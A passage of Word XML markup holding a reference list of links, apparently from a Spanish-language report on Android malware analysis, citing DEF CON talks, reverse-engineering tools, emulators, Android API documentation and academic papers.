          <w:p w14:paraId="4D03E207" w14:textId="6ED146BF" w:rsidR="00282F9A" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId94" w:history="1">
              <w:r w:rsidR="00FE097F" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEF%20CON%2025%20-%20Slava-Makkaveev-and-Avi-Bashan-Unboxing-Android.pdf</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="0CC8E689" w14:textId="29CCFC63" w:rsidR="002A324F" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId95" w:history="1">
              <w:r w:rsidR="002A324F" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://github.com/Guardsquare/proguard</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6F8DC41C" w14:textId="5A75BE0C" w:rsidR="007A3ED4" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId96" w:history="1">
              <w:r w:rsidR="007A3ED4" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://media.defcon.org/DEF%20CON%2022/DEF%20CON%2022%20presentations/DEF%20CON%2022%20-%20Strazzere-and-Sawyer-Android-Hacker-Protection-Level-UPDATED.pdf</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="5DF3B33E" w14:textId="51B61CE5" w:rsidR="00866008" w:rsidRDefault="007A3ED4" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A3ED4">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId97" w:history="1">
              <w:r w:rsidR="003564C1" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://github.com/skylot/jadx</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6FE065F3" w14:textId="01924B34" w:rsidR="00F17032" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId98" w:history="1">
              <w:r w:rsidR="00B02397" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://www.ghidra-sre.org/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="721BB05F" w14:textId="3EA18F76" w:rsidR="00D83DF0" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId99" w:history="1">
              <w:r w:rsidR="00D83DF0" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://www.researchgate.net/publication/262412421_DIVILAR_Diversifying_intermediate_language_for_anti-repackaging_on_Android_platform</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="5CC33F49" w14:textId="782D19CA" w:rsidR="00544BB1" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId100" w:history="1">
              <w:r w:rsidR="00544BB1" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://kclpure.kcl.ac.uk/ws/portalfiles/portal/112357801/The_Evolution_of_Android_Malware_TAM_2017_GREEN_AAM.pdf</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="628635E0" w14:textId="53934588" w:rsidR="00272421" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId101" w:history="1">
              <w:r w:rsidR="00272421" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://developer.android.com/studio/run/emulator</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="39B3A9B0" w14:textId="50088993" w:rsidR="00541448" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId102" w:history="1">
              <w:r w:rsidR="00A03BEA" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://www.genymotion.com/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="07D35EC4" w14:textId="776C8D56" w:rsidR="00541448" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId103" w:history="1">
              <w:r w:rsidR="00272421" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://www.android-x86.org/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="40800093" w14:textId="0AC45DA6" w:rsidR="009D5B59" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId104" w:history="1">
              <w:r w:rsidR="009D5B59" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://users.ece.cmu.edu/~tvidas/papers/SPSM14.pdf</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="668917EF" w14:textId="5241B1F7" w:rsidR="003B56CE" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId105" w:history="1">
              <w:r w:rsidR="003B56CE" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://www.cis.upenn.edu/~mhnaik/papers/fse12_full.pdf</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="132B7AE7" w14:textId="36CF983C" w:rsidR="00EF4B01" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId106" w:history="1">
              <w:r w:rsidR="00EF4B01" w:rsidRPr="00196034">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://en.wikipedia.org/wiki/List_of_file_signatures</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="59E2D390" w14:textId="403BCD51" w:rsidR="00C15076" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId107" w:history="1">
              <w:r w:rsidR="00C15076" w:rsidRPr="001D1F7B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://www.seg-social.es/wps/portal/wss/internet/Trabajadores/CotizacionRecaudacionTrabajadores/36537</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="241E3D80" w14:textId="5C34F0C1" w:rsidR="009C0ECB" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId108" w:history="1">
              <w:r w:rsidR="009C0ECB" w:rsidRPr="001D1F7B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://www.incibe.es/sites/default/files/contenidos/guias/doc/guia_nacional_notificacion_gestion_ciberincidentes.pdf</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="50324D7C" w14:textId="60692A98" w:rsidR="00773EB6" w:rsidRDefault="00773EB6" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00773EB6">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>https://www.recordedfuture.com/blog/2020-adversary-infrastructure-report</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A6213C0" w14:textId="4012F191" w:rsidR="002F0EA6" w:rsidRDefault="002F0EA6" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F0EA6">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>https://rednaga.io/2016/07/30/apkid_andandroid_compiler_fingerprinting/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E7FACB6" w14:textId="14E0A58F" w:rsidR="00820DE7" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId109" w:history="1">
              <w:r w:rsidR="00820DE7" w:rsidRPr="003773B4">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://metrika.yandex.ru/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="186D637E" w14:textId="46C5CCC7" w:rsidR="00670A62" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId110" w:history="1">
              <w:r w:rsidR="00670A62" w:rsidRPr="003773B4">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://developer.android.com/reference/android/Manifest.permission</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="68D97BC4" w14:textId="5C7E222B" w:rsidR="00EB7D44" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId111" w:history="1">
              <w:r w:rsidR="00EB7D44" w:rsidRPr="009A6F20">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://developer.android.com/reference/android/accessibilityservice/AccessibilityService</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="09332F61" w14:textId="4290EA1C" w:rsidR="00EB7D44" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId112" w:history="1">
              <w:r w:rsidR="00F87D35" w:rsidRPr="009A6F20">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://developer.android.com/reference/android/service/notification/NotificationListenerService</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="223CD6CB" w14:textId="448E8E7C" w:rsidR="00696228" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId113" w:history="1">
              <w:r w:rsidR="00696228" w:rsidRPr="0079765E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://reactnative.dev/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="2AECAE36" w14:textId="72BD1D59" w:rsidR="003B28EC" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId114" w:history="1">
              <w:r w:rsidR="003B28EC" w:rsidRPr="0079765E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://developer.android.com/develop/ui/views/layout/webapps/webview</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="0B447B90" w14:textId="52679BAB" w:rsidR="009E5219" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId115" w:history="1">
              <w:r w:rsidR="009E5219" w:rsidRPr="00DA14F7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://play.google.com/store/apps/details?id=com.elink.fittrackhealth.pro</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="241592E4" w14:textId="37A26B4F" w:rsidR="0010643C" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId116" w:history="1">
              <w:r w:rsidR="009E5219" w:rsidRPr="00DA14F7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://www.acra.ch/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="388B17F7" w14:textId="570F39F4" w:rsidR="006D408F" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId117" w:history="1">
              <w:r w:rsidR="006D408F" w:rsidRPr="009A6F20">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://en.wikipedia.org/wiki/List_of_file_signatures</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1EC8D15A" w14:textId="47A10781" w:rsidR="00FC7409" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId118" w:history="1">
              <w:r w:rsidR="00FC7409" w:rsidRPr="00640B4D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://developer.mozilla.org/en-US/docs/Glossary/UUID</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="5ABC7591" w14:textId="522B402F" w:rsidR="004F2B74" w:rsidRDefault="004F2B74" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F2B74">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>https://source.android.com/docs/security/features/biometric</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FB738E7" w14:textId="0C3E27E0" w:rsidR="00407D24" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId119" w:history="1">
              <w:r w:rsidR="00407D24" w:rsidRPr="00471C78">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://www.ibm.com/docs/en/zos/2.4.0?topic=rules-pkcs-padding-method</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6D4891FB" w14:textId="61D14845" w:rsidR="00FC7409" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId120" w:history="1">
              <w:r w:rsidR="00FC7409" w:rsidRPr="00640B4D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://docs.oracle.com/javase%2F8%2Fdocs%2Fapi%2F%2F/java/net/CookieManager.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="64DA3A34" w14:textId="277EC75B" w:rsidR="00B772BC" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId121" w:history="1">
              <w:r w:rsidR="00B772BC" w:rsidRPr="00736DC5">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://www.synopsys.com/blogs/software-security/cve-2020-7958-trustlet-tee-attack.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="66736F4B" w14:textId="5B34E37E" w:rsidR="00E7694C" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId122" w:history="1">
              <w:r w:rsidR="00E7694C" w:rsidRPr="00DA14F7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://en.wikipedia.org/wiki/Unstructured_Supplementary_Service_Data</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="7FAE0B66" w14:textId="4F6CD3F0" w:rsidR="002D0C44" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId123" w:history="1">
              <w:r w:rsidR="002D0C44" w:rsidRPr="00DA14F7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://developer.android.com/guide/topics/ui/notifiers/toasts</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="35F93BA7" w14:textId="5786A008" w:rsidR="00D27957" w:rsidRDefault="00D27957" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId124" w:history="1">
              <w:r w:rsidRPr="00E72F43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://github.com/torvalds/linux/blob/master/fs/eventpoll.c</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="62144634" w14:textId="65C79F41" w:rsidR="00180C83" w:rsidRDefault="00180C83" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId125" w:history="1">
              <w:r w:rsidRPr="00E72F43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://developer.android.com/topic/performance/baselineprofiles/overview?hl=es-419</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="528FFCB3" w14:textId="270D411C" w:rsidR="00180C83" w:rsidRDefault="00E4294E" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId126" w:history="1">
              <w:r w:rsidRPr="00E72F43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://www.sqlite.org/tempfiles.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="06CF0A35" w14:textId="00802EA0" w:rsidR="0089340B" w:rsidRDefault="0089340B" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId127" w:history="1">
              <w:r w:rsidRPr="00E72F43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://android.googlesource.com/platform/frameworks/webview/+/f989a7846d5fe4116de1a0635a8aade09d2be7b2/chromium/java/com/android/webview/chromium/WebViewChromiumFactoryProvider.java</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="15B07D74" w14:textId="26405C22" w:rsidR="00C36DC0" w:rsidRDefault="00C36DC0" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId128" w:history="1">
              <w:r w:rsidRPr="00E72F43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://whois-history.whoisxmlapi.com/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="69C31AAE" w14:textId="65CC2E11" w:rsidR="000C760F" w:rsidRDefault="000C760F" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId129" w:history="1">
              <w:r w:rsidRPr="00E72F43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://developer.android.com/studio/run/emulator-networking?hl=es-419</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="67078AB1" w14:textId="11FCB7AF" w:rsidR="000C760F" w:rsidRDefault="000C760F" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId130" w:history="1">
              <w:r w:rsidRPr="00E72F43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://support.genymotion.com/hc/en-us/articles/4402754157969-How-to-access-a-local-host-or-service-from-a-virtual-device</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="5D24DEE1" w14:textId="77777777" w:rsidR="000C760F" w:rsidRDefault="000C760F" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51095D57" w14:textId="77777777" w:rsidR="00C36DC0" w:rsidRDefault="00C36DC0" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D88B78E" w14:textId="77777777" w:rsidR="0089340B" w:rsidRDefault="0089340B" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="68EFC988" w14:textId="77777777" w:rsidR="00E4294E" w:rsidRDefault="00E4294E" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="09501733" w14:textId="77777777" w:rsidR="00D27957" w:rsidRDefault="00D27957" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="602313A9" w14:textId="77777777" w:rsidR="002D0C44" w:rsidRDefault="002D0C44" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7ABB9F15" w14:textId="77777777" w:rsidR="00E7694C" w:rsidRDefault="00E7694C" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7FC65DE0" w14:textId="77777777" w:rsidR="00B772BC" w:rsidRDefault="00B772BC" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5CD0B4E7" w14:textId="77777777" w:rsidR="00FC7409" w:rsidRDefault="00FC7409" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="04825A90" w14:textId="77777777" w:rsidR="00407D24" w:rsidRDefault="00407D24" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7CDF26B6" w14:textId="77777777" w:rsidR="006D408F" w:rsidRDefault="006D408F" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1F059F28" w14:textId="77777777" w:rsidR="0010643C" w:rsidRDefault="0010643C" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7357AC4D" w14:textId="77777777" w:rsidR="00F87D35" w:rsidRDefault="00F87D35" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5975F26A" w14:textId="77777777" w:rsidR="00670A62" w:rsidRDefault="00670A62" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6D026AAF" w14:textId="77777777" w:rsidR="00820DE7" w:rsidRDefault="00820DE7" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="168F34F1" w14:textId="77777777" w:rsidR="009C0ECB" w:rsidRDefault="009C0ECB" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B95033B" w14:textId="77777777" w:rsidR="00C15076" w:rsidRDefault="00C15076" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="15CB1BFA" w14:textId="77777777" w:rsidR="00EF4B01" w:rsidRDefault="00EF4B01" w:rsidP="007E3358">
